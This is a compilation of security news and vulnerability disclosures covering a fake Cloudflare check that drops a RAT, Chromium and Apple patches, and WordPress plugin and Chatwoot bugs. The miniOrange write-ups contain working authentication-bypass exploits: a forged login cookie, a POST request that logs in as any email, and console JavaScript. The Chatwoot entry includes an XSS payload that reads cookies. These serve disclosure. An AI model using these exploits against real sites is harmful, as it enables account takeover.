Security vendor Sucuri says adversaries are injecting malicious JavaScript into numerous WordPress websites that triggers phony bot-related checks.

Threat actors are spoofing Cloudflare DDoS bot-checks in an attempt to drop a remote-access Trojan (RAT) on systems belonging to visitors to some previously compromised WordPress websites.

Researchers from Sucuri recently spotted the new attack vector while investigating a surge in JavaScript injection attacks targeting WordPress sites. They observed the attackers injecting a script into the WordPress websites that triggered a fake prompt claiming to be the website verifying if a site visitor is human or a DDoS bot.

Many Web application firewalls (WAFs) and content distribution network services routinely serve up such alerts as part of their DDoS protection service. Sucuri observed this new JavaScript on WordPress sites triggering a fake Cloudflare DDoS protection pop-up.

Users who clicked on the fake prompt to access the website ended up with a malicious .iso file downloaded onto their systems. They then received a new message asking them to open the file so they can receive a verification code for accessing the website. "Since these types of browser checks are so common on the web many users wouldn't think twice before clicking this prompt to access the website they're trying to visit," Sucuri wrote. "What most users do not realize is that this file is in fact a remote access trojan, currently flagged by 13 security vendors at the time of this post."

**Dangerous RAT**

Sucuri identified the remote-access Trojan as NetSupport RAT, a malware tool that ransomware actors have previously used to footprint systems before delivering ransomware on them. The RAT has also been used to drop Racoon Stealer, a well-known information stealer that briefly dropped out of sight earlier this year before surging back on the threat landscape in June. Racoon Stealer surfaced in 2019 and was one of the most prolific information stealers of 2021. Threat actors have distributed it in a variety of ways, including malware-as-a-service models and by planting it on websites selling pirated software. With the fake Cloudflare DDoS protection prompts, threat actors now have a new way of distributing the malware.

"Threat actors, particularly when phishing, will use anything that looks legitimate to fool users," says John Bambenek, principal threat hunter at Netenrich. As people get used to mechanisms like Captcha's for detecting and blocking bots, it makes sense for threat actors to use those same mechanisms to try to fool users, he says. "This not only can be used to get people to install malware, but could be used for 'credential checks' to steal credentials of major cloud services (such as) Google, Microsoft, and Facebook," Bambenek says.

Ultimately, website operators need a way to tell the difference between a real user and a synthetic one, or a bot, he notes. But often the more effective the tools for detecting bots get, the harder they get for users to decode, Bambenek adds.

Charles Conley, senior cyber security researcher at nVisium, says that using content spoofing of the kind that Sucuri observed to deliver a RAT is not especially new. Cybercriminals have routinely spoofed business-related apps and services from companies such as Microsoft, Zoom, and DocuSign to deliver malware and trick users into executing all kinds of unsafe software and actions.

However, with browser-based spoofing attacks, default settings on browsers such as Chrome that hide the full URL or operating systems like Windows that hide file extensions can make it harder for even discerning individuals to tell what they're downloading and where it's from, Conley says.

Fake DDoS Protection Alerts Distribute Dangerous RAT

Gentoo Linux Security Advisory 202208-35 - Multiple vulnerabilities have been found in Chromium and its derivatives, the worst of which could result in remote code execution. Versions less than 104.0.5112.101 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202208-35  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Chromium, Google Chrome, Microsoft Edge: Multiple Vulnerabilities  
     Date: August 21, 2022  
     Bugs: #858104, #859442, #863512, #865501, #864723  
       ID: 202208-35

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been found in Chromium and its  
derivatives, the worst of which could result in remote code execution.

Background  
=========  
Chromium is an open-source browser project that aims to build a safer,  
faster, and more stable way for all users to experience the web.

Google Chrome is one fast, simple, and secure browser for all your  
devices.

Microsoft Edge is a browser that combines a minimal design with  
sophisticated technology to make the web faster, safer, and easier.

Affected packages  
================  
    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  www-client/chromium        < 104.0.5112.101    >= 104.0.5112.101  
  2  www-client/chromium-bin    < 104.0.5112.101    >= 104.0.5112.101  
  3  www-client/google-chrome   < 104.0.5112.101    >= 104.0.5112.101  
  4  www-client/microsoft-edge  < 104.0.1293.63      >= 104.0.1293.63

Description  
==========  
Multiple vulnerabilities have been discovered in Chromium and its  
derivatives. Please review the CVE identifiers referenced below for  
details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Chromium users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/chromium-104.0.5112.101"

All Chromium binary users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/chromium-bin-104.0.5112.101"

All Google Chrome users should upgrade to tha latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/google-chrome-104.0.5112.101"

All Microsoft Edge users should upgrade to tha latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/microsoft-edge-104.0.1293.63"

References  
=========  
[ 1 ] CVE-2022-2163  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2163  
[ 2 ] CVE-2022-2294  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2294  
[ 3 ] CVE-2022-2295  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2295  
[ 4 ] CVE-2022-2296  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2296  
[ 5 ] CVE-2022-2477  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2477  
[ 6 ] CVE-2022-2478  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2478  
[ 7 ] CVE-2022-2479  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2479  
[ 8 ] CVE-2022-2480  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2480  
[ 9 ] CVE-2022-2481  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2481  
[ 10 ] CVE-2022-2603  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2603  
[ 11 ] CVE-2022-2604  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2604  
[ 12 ] CVE-2022-2605  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2605  
[ 13 ] CVE-2022-2606  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2606  
[ 14 ] CVE-2022-2607  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2607  
[ 15 ] CVE-2022-2608  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2608  
[ 16 ] CVE-2022-2609  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2609  
[ 17 ] CVE-2022-2610  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2610  
[ 18 ] CVE-2022-2611  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2611  
[ 19 ] CVE-2022-2612  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2612  
[ 20 ] CVE-2022-2613  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2613  
[ 21 ] CVE-2022-2614  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2614  
[ 22 ] CVE-2022-2615  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2615  
[ 23 ] CVE-2022-2616  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2616  
[ 24 ] CVE-2022-2617  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2617  
[ 25 ] CVE-2022-2618  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2618  
[ 26 ] CVE-2022-2619  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2619  
[ 27 ] CVE-2022-2620  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2620  
[ 28 ] CVE-2022-2621  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2621  
[ 29 ] CVE-2022-2622  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2622  
[ 30 ] CVE-2022-2623  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2623  
[ 31 ] CVE-2022-2624  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2624  
[ 32 ] CVE-2022-2852  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2852  
[ 33 ] CVE-2022-2853  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2853  
[ 34 ] CVE-2022-2854  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2854  
[ 35 ] CVE-2022-2855  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2855  
[ 36 ] CVE-2022-2856  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2856  
[ 37 ] CVE-2022-2857  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2857  
[ 38 ] CVE-2022-2858  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2858  
[ 39 ] CVE-2022-2859  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2859  
[ 40 ] CVE-2022-2860  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2860  
[ 41 ] CVE-2022-2861  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2861  
[ 42 ] CVE-2022-33636  
      https://nvd.nist.gov/vuln/detail/CVE-2022-33636  
[ 43 ] CVE-2022-33649  
      https://nvd.nist.gov/vuln/detail/CVE-2022-33649  
[ 44 ] CVE-2022-35796  
      https://nvd.nist.gov/vuln/detail/CVE-2022-35796

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202208-35

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202208-35

Authentication Bypass vulnerability in miniOrange WP OAuth Server plugin <= 3.0.4 at WordPress.



The plugin was affected by an Auth Bypass vulnerability. To bypass authentication, we only need to know the user’s username. Depending on whose username we know, which can be easily queried because it is usually public data, we may even be given an administrator role on the client’s website.

**Let’s check the plugin**

The _mo_get_logged_user_from_auth_cookie() function get logged in user with the following code:

    $auth_cookie = wp_parse_auth_cookie( '', 'logged_in' );
    
    if ( ! $auth_cookie || is_wp_error( $auth_cookie ) || ! $auth_cookie['token'] || ! $auth_cookie['username'] ) {
    	return false;
    }}

We can see from the code that it uses the wp_parse_auth_cookie() function. Which is a completely faulty use in this case, as it does not use authentication. Description of the function:

> Authentication cookie components. None of the components should be assumed to be valid as they come directly from a client-provided cookie value.

It is clearly described that the returned value is not validated. But the plugin doesn’t use any validation.

**Let’s see how we can exploit this vulnerability**

All we have to do is set a logged in cookie that contains the username. The other values can be anything, as there is no validation in the plugin.

The default logged in cookie name is:

    define( 'LOGGED_IN_COOKIE', 'wordpress_logged_in_' . COOKIEHASH );

where the hash is:

    define( 'COOKIEHASH', md5( $siteurl ) );

So in the https://lana.solutions/vdb/miniorange-oauth-server which is a test WordPress website:

57a442d3cd2a47583304a69461f75869, which is the result of the following function:

    echo md5('https://lana.solutions/vdb/miniorange-oauth-server');

If we set the following cookie, we can authenticate ourselves as a test user on the OAuth server:

    wordpress_logged_in_57a442d3cd2a47583304a69461f75869=test%7Canything%7Canything%7Canything;

Let’s try it in the easiest way. I created a JavaScript code for the exploit that set the logged in cookie.

So we can even do this through a browser by opening the server’s website, which in our case is https://lana.solutions/vdb/miniorange-oauth-server/, then going to the console and entering the following code:

    document.cookie="wordpress_logged_in_57a442d3cd2a47583304a69461f75869=test%7Canything%7Canything%7Canything";

Then open the client’s website, which in our case is https://lana.solutions/vdb/miniorange-oauth-client/wp-admin and log in using the Single Sign On button.

**The professional exploit script**

I created a Python script with Selenium that exploits the vulnerability and automatically opens the webpage in Google Chrome:

Source: miniorange\_oauth\_server\_plugin\_vdb\_exploit\_with\_selenium.py

How to use:

    python3 miniorange_oauth_server_plugin_vdb_exploit_with_selenium.py --client_url="https://lana.solutions/vdb/miniorange-oauth-client/" --server_url="https://lana.solutions/vdb/miniorange-oauth-server/" --username="test"

Run the above command in the Linux (desktop version) terminal.

How the exploit works step by step:

*   Opens OAuth server website
*   Sets the logged in cookie with the “test” username
*   Opens OAuth client website
*   Click Single Sign On button (so it starts OAuth authentication)

**Try it**

Feel free to try and use the lana.solutions/vdb WordPress websites for testing. I have set the roles and capabilities, so you can only get low level access to the website.

Client: https://lana.solutions/vdb/miniorange-oauth-client/

Server: https://lana.solutions/vdb/miniorange-oauth-server/

CVE-2022-34149: WP OAuth Server (Login with WordPress) by miniOrange WordPress plugin Authentication Bypass

Authentication Bypass vulnerability in miniOrange OAuth 2.0 client for SSO plugin <= 1.11.3 at WordPress.



The plugin was affected by an Auth Bypass vulnerability. To bypass authentication, we only need to know the user’s email address. Depending on whose email address we know, we may even be given an administrator role on the client’s website.

**Let’s check the plugin**

The mo_oauth_login_validate() function includes the following request handling:

    if ( isset( $_REQUEST['option'] ) and strpos( $_REQUEST['option'], 'mooauth' ) !== false ) {
    
    	$user_email = '';
    	if ( array_key_exists( 'email', $_POST ) ) {
    		$user_email = sanitize_email( $_POST['email'] );
    	}
    	
    	if ( $user_email ) {
    		if ( email_exists( $user_email ) ) { // user is a member
    			$user    = get_user_by( 'email', $user_email );
    			$user_id = $user->ID;
    			wp_set_auth_cookie( $user_id, true );
    		} else { // this user is a guest
    			$random_password = wp_generate_password( 10, false );
    			$user_id         = wp_create_user( $user_email, $random_password, $user_email );
    			wp_set_auth_cookie( $user_id, true );
    		}
    	}
    	wp_redirect( home_url() );
    	exit;
    }

We can see from the code that if we specify $_POST['email'], the plugin will log the user in using the wp_set_auth_cookie() function. No verification or authentication. Nothing.

The other problem with the plugin is that if we give an email address in the request that does not exist in the database, it will create a new user, even if registration on the WordPress website is not enabled.

**Let’s see how we can exploit this vulnerability**

We only need to send a POST request to exploit this vulnerability.

The HTTP request to the https://lana.solutions/vdb/miniorange-oauth-client/ which is a test WordPress website:

    POST /vdb/miniorange-oauth-client/ HTTP/1.1
    Host: lana.solutions
    Content-Type: application/x-www-form-urlencoded
    
    option=mooauth&[email protected]

Let’s try it in the easiest way. I created a JavaScript code for the exploit that sends a POST request:

So we can even do this through a browser by opening the client’s website, which in our case is https://lana.solutions/vdb/miniorange-oauth-client/, then going to the console and entering the following code:

    var xhr = new XMLHttpRequest();
    xhr.open('POST', 'https://lana.solutions/vdb/miniorange-oauth-client/', true);
    xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    xhr.onload = function() {
    	window.location.href = 'https://lana.solutions/vdb/miniorange-oauth-client/wp-admin/';
    }
    xhr.send('option=mooauth&[email protected]');

After successful login, the script will redirect us to the WordPress admin.

**The exploit script**

I created a Python script that returns the WordPress logged\_in cookie:

Source: miniorange\_oauth\_client\_plugin\_vdb\_get\_exploit\_cookie.py

How to use:

    python3 miniorange_oauth_client_plugin_vdb_get_exploit_cookie.py --client_url="https://lana.solutions/vdb/miniorange-oauth-client/" --email="[email protected]"

Run the above command in the Linux terminal.

We get something like this:

    wordpress_logged_in_7c51fdb9c753be4972c4c2d647b5ded1=test%7C1656911674%7C2PsqjZ8FHWAqXOhJFcIU7yQPaQFOwVIpOfdZmQEyavx%7C940bbe2d2e3736724984b401f8f829811e541ffe3eb948f407aeeaae11f423f6

Then all we have to do is use a cookie, such as JavaScript, in the browser console in the client’s website, which in our case is https://lana.solutions/vdb/miniorange-oauth-client/

    document.cookie="wordpress_logged_in_7c51fdb9c753be4972c4c2d647b5ded1=test%7C1656911674%7C2PsqjZ8FHWAqXOhJFcIU7yQPaQFOwVIpOfdZmQEyavx%7C940bbe2d2e3736724984b401f8f829811e541ffe3eb948f407aeeaae11f423f6"; location.reload();

**The professional exploit script**

I also created a Python script with Selenium that exploits the vulnerability and automatically opens the webpage in Google Chrome:

Source: miniorange\_oauth\_client\_plugin\_vdb\_exploit\_with\_selenium.py

How to use:

    python3 miniorange_oauth_client_plugin_vdb_exploit_with_selenium.py --client_url="https://lana.solutions/vdb/miniorange-oauth-client/" --email="[email protected]"

Run the above command in the Linux (desktop version) terminal.

**Try it**

Feel free to try and use the lana.solutions/vdb WordPress websites for testing. I have set the roles and capabilities, so you can only get low level access to the website.

Client: https://lana.solutions/vdb/miniorange-oauth-client/

Server: https://lana.solutions/vdb/miniorange-oauth-server/

**Additional tests**

I created a Postman request for exploit: Postman Web – MiniOrange Auth Request

Can be used by anyone after fork. The required variables are stored in the collection.

CVE-2022-34858: OAuth 2.0 client for SSO by miniOrange WordPress plugin Authentication Bypass

Authenticated (admin+) Stored Cross-Site Scripting (XSS) vulnerability in WebbaPlugins Webba Booking plugin <= 4.2.21 at WordPress.

CVE-2021-36847: Webba Booking: Appointment & Event Booking Calendar Plugin

Categories: Exploits and vulnerabilities
Categories: News
CISA updated its catalog of actively exploited vulnerabilities. Make sure you update your software before the due date!



(Read more...)




The post CISA wants you to patch these actively exploited vulnerabilities before September 8 appeared first on Malwarebytes Labs.

On Thursday, CISA (the US Cybersecurity and Infrastructure Security Agency) updated its catalog of actively exploited vulnerabilities by adding seven new entries. These flaws were found in Apple, Google, Microsoft, Palo Alto Networks, and SAP products. CISA set the due date for everyone to patch the weaknesses by September 8, 2022.

CVE-2022-22536, an SAP flaw with the highest risk score of 10, is one of the seven. We wrote about it in February, and thankfully, SAP addressed the issue fairly quickly, too, by issuing a patch. CISA even mentioned that if customers fail to patch CVE-2022-22536, they could be exposed to ransomware attacks, data theft, financial fraud, and other business disruptions that'd cost them millions.

**CVE-2022-32893** and **CVE-2022-32894**, the two zero-day, out-of-bounds write vulnerabilities affecting iOS, iPadOS, and macOS, continue to headline as of this writing. These are serious flaws that, if left unpatched, could allow anyone to take control of vulnerable Apple systems. Apple already released fixes for these from the following support pages:

*   About the security content of iOS 15.6.1 and iPadOS 15.6.1
*   About the security content of macOS Monterey 12.5.1
*   About the security content of Safari 15.6.1

The Google Chrome flaw with high severity, **CVE-2022-2856**, is also confirmed to be targeted by hackers. As with other zero-days, technical details about it are light, but the advisory states that the flaw is an "insufficient validation of untrusted input in Intents." The Intents technology works in the background and is involved in processing user input or handling a system event. If this flaw is exploited, anyone could create a malicious input that Chrome may validate incorrectly, leading to arbitrary code execution or system takeover.

Google already patched this. While Chrome should've updated automatically, it is recommended to force an update check to ensure the patch is applied.

Microsoft also has patches available for **CVE-2022-21971** and **CVE-2022-26923** in February and May, respectively. The former was given an "exploitation less likely" probability, but that has already changed—a proof-of-concept (PoC) has been available since March. PoC exploits were also made public for the latter Microsoft flaw. However, these were released after Microsoft had already pushed out a patch.

Palo Alto Networks's is the oldest among the new vulnerabilities added to the catalog. Discovered in 2017, **CVE-2017-15944** has a severity rating of 9.8 (Critical). Once exploited, attackers could perform remote code execution on affected systems. You can read more about this flaw on Palo Alto's advisory page.

Malwarebytes advises readers to apply patches to these flaws if they use products of the companies we mentioned. You don't have to wait for the due date before you act.

CISA wants you to patch these actively exploited vulnerabilities before September 8

Multiple SQL injections detected in Bus Pass Management System 1.0 via buspassms/admin/view-enquiry.php, buspassms/admin/pass-bwdates-reports-details.php, buspassms/admin/changeimage.php, buspassms/admin/search-pass.php, buspassms/admin/edit-category-detail.php, and buspassms/admin/edit-pass-detail.php

**Project Name**

Bus Pass Management System Project

**Language Used**

PHP5.6, PHP7.x

**Database**

MySQL 5.x

**User Interface Design**

HTML, AJAX,JQUERY,JAVASCRIPT

**Web Browser**

Mozilla, Google Chrome, IE8, OPERA

**Software**

XAMPP / Wamp / Mamp/ Lamp (anyone)

Bus Pass Management Project in Php is a web-based technology that will manage the records of the pass which is issue by administrative and also help to provide online bus pass to people who need to travel daily. Bus Pass Management System project is helpful to bus administration by reducing the paperwork, time consumption and makes the process of getting bus passes as simple and fast.

Bus Pass Management system uses PHP and MySQL databases. This is the project which keeps records of the pass which is issue by the administrative. Bus Pass Management system has two modules i.e. admin and user.

**Admin**

**Dashboard**: In this sections, admin can briefly view the total number of categories and how many passes will be generated in one day, yesterdays and the last seven’s days

**Category**: In this section, admin can manage the category (add/update).

**Passes**: In this section, admin can manage pass(add/update/take print pass).

**Pages:** In this section, admin can update about us and contact us pages.

**Enquiry:** In this section, admin reads the inquiries which are sent by users.

**Reports**: In this section admin can generate pass reports between two dates.

**Search**: In this section, admin can search a particular pass bypass number.

Admin can also update his profile, change the password and recover the password.

**User**

1.  **Home Page:** User can visit home page.
2.  **View Pass:** User can view his/her pass and take print with the help of their Pass Number.
3.  **About Us**: User sees the details of .website administrator.
4.  **Contact Us**: User can contact with website administrator.

**Note**:  In this project, the MD5 encryption method was used.

**Some of the Bus Pass Management Project Screens**

**Home Page**

**Home Page**

**Pass Details**

Pass Details

**Admin Dashboard**

**Admin Dashboard**

**Add/Create Pass**

**Add/Create Pass**

**How to run the Bus Pass Management System Project Using PHP and MySQL**

*   Download the zip file
*   Extract the file and copy buspassms folder
*   Paste inside root directory(for xampp xampp/htdocs, for wamp wamp/www, for lamp var/www/html)
*   Open PHPMyAdmin (http://localhost/phpmyadmin)
*   Create a database with name buspassdb
*   Import buspassdb.sql file(given inside the zip package in SQL file folder)
*   Run the script http://localhost/buspassms

**Admin Credential**  
**Username:** admin  
**Password:** Test@123

**Pass number:** 681924385 or you can create a new pass.

**+++++++++++++++++View Demo+++++++++++++++++++++**

Download Full Source Code (Bus Pass Management System)

Size: 2.43 MB

Version: V 1.0

**Project Report**

Anuj Kumar

Hi! I am Anuj Kumar, a professional web developer with 5+ years of experience in this sector. I found PHPGurukul in September 2015. My keen interest in technology and sharing knowledge with others became the main reason for starting PHPGurukul. My basic aim is to offer all web development tutorials like PHP, PDO, jQuery, PHP oops, MySQL, etc. Apart from the tutorials, we also offer you PHP Projects, and we have around 100+ PHP Projects for you.

CVE-2022-36198: Bus Pass Management System in Php | Bus Pass Management Project Using PHP

Cross-site Scripting (XSS) - DOM in GitHub repository chatwoot/chatwoot prior to 2.7.0.

**Title**

XSS in markdown link-maker

**Description**

While chatting with a client, both sides may use markdown. However, neither client's nor Chatwoot inner user's input is verified.

**Steps to reproduce.**

Note: this works in Safari and Firefox, not Chrome.

I will use Telegram bot.

1.  1\. Start a conversation as an attacker with Chatwoot staff using created Telegram bot.
2.  2\. Send payload [clickMe](javascript:alert(document.cookie)) as a message.
3.  3\. As a Chatwoot staff click on the link, trigger an XSS.

Also it is possible to create a malicious link as a staff (e.g. leave it in other's staff conversation in order to trigger an XSS on their side).

1.  1\. While intercepting your traffic send a message [clickMe](https://google.com) to pass frontend check.
2.  2\. In the outcoming POST request to /api/v1/accounts/2/conversations/1/messages modify the body, so it looked something like this:

    {
        "content":"[click](javascript:alert(document.cookie))",
        "private":false,
        "echo_id":"{yourId}",
        "cc_emails":"",
        "bcc_emails":""
    }
    

3.  3\. As some other staff click on the link, trigger an XSS.

I'm leaving a video PoC for both cases:

Video PoC

**Possible remediation**

Verify message content.

**Impact**

This vulnerability is capable of running an arbitrary JS code.

CVE-2022-0542: Cross-site Scripting (XSS) - DOM in chatwoot

Chrome suffers from a heap use-after-free vulnerability in content::ServiceWorkerVersion::MaybeTimeoutRequest. Google Chrome version 103.0.5060.53 and Chromium version 105.0.5134.0 are affected.

Chrome content::ServiceWorkerVersion::MaybeTimeoutRequest Heap Use-After-Free

Separate fixes to macOS and iOS patch respective flaws in the kernel and WebKit that can allow threat actors to take over devices and are under attack.

Separate fixes to macOS and iOS patch respective flaws in the kernel and WebKit that can allow threat actors to take over devices and are under attack.

Apple is urging macOS, iPhone and iPad users immediately to install respective updates this week that includes fixes for two zero-days under active attack. The patches are for vulnerabilities that allow attackers to execute arbitrary code and ultimately take over devices.

Patches are available for effected devices running iOS 15.6.1 and macOS Monterey 12.5.1. Patches address two flaws, which basically impact any Apple device that can run either iOS 15 or the Monterey version of its desktop OS, according to security updates released by Apple Wednesday.

One of the flaws is a kernel bug (CVE-2022-32894), which is present both in iOS and macOS. According to Apple it is an “out-of-bounds write issue \[that\] was addressed with improved bounds checking.”

The vulnerability allows an application to execute arbitrary code with kernel privileges, according to Apple, which, in usual vague fashion, said there is a report that it “may have been actively exploited.”

The second flaw is identified as a WebKit bug (tracked as CVE-2022-32893), which is an out-of-bounds write issue that Apple addressed with improved bounds checking. The flaw allows for processing maliciously crafted web content that can lead to code execution, and also has been reported to be under active exploit, according to Apple. WebKit is the browser engine that powers Safari and all other third-party browsers that work on iOS.

**Pegasus-Like Scenario**

The discovery of both flaws, about which little more beyond Apple’s disclosure are known, was credited to an anonymous researcher.

One expert expressed worry that the latest Apple flaws “could effectively give attackers full access to device,” they might create a Pegasus-like scenario similar to the one in which nation-state APTs barraged targets with spyware made by Israeli NSO Group by exploiting an iPhone vulnerability.

“For most folks: update software by end of day,” tweeted Rachel Tobac, the CEO of SocialProof Security, regarding the zero-days. “If threat model is elevated (journalist, activist, targeted by nation states, etc): update now,” Tobac warned.

**Zero-Days Abound**

The flaws were unveiled alongside other news from Google this week that it was patching its fifth zero-day so far this year for its Chrome browser, an arbitrary code execution bug under active attack.

The news of yet more vulnerabilities from top tech vendors being barraged by threat actors demonstrates that despite the best efforts from top-tier tech companies to address perennial security issues in their software, it remains an uphill battle, noted Andrew Whaley, senior technical director at Promon, a Norwegian app security company.

The flaws in iOS are especially worrying, given the ubiquity of iPhones and users’ utter reliance on mobile devices for their daily lives, he said. However, the onus is not only on vendors to protect these devices but also for users to be more aware of existing threats, Whaley observed.

“While we all rely on our mobile devices, they are not invulnerable, and as users we need to maintain our guard just like we do on desktop operating systems,” he said in an email to Threatpost.

At the same time, developers of apps for iPhones and other mobile devices also should add an extra layer of security controls in their technology so they are less reliant on OS security for protection, given the flaws that frequently crop up, Whaley observed.

“Our experience shows that this is not happening enough, potentially leaving banking and other customers vulnerable,” he said.

Tag

#chrome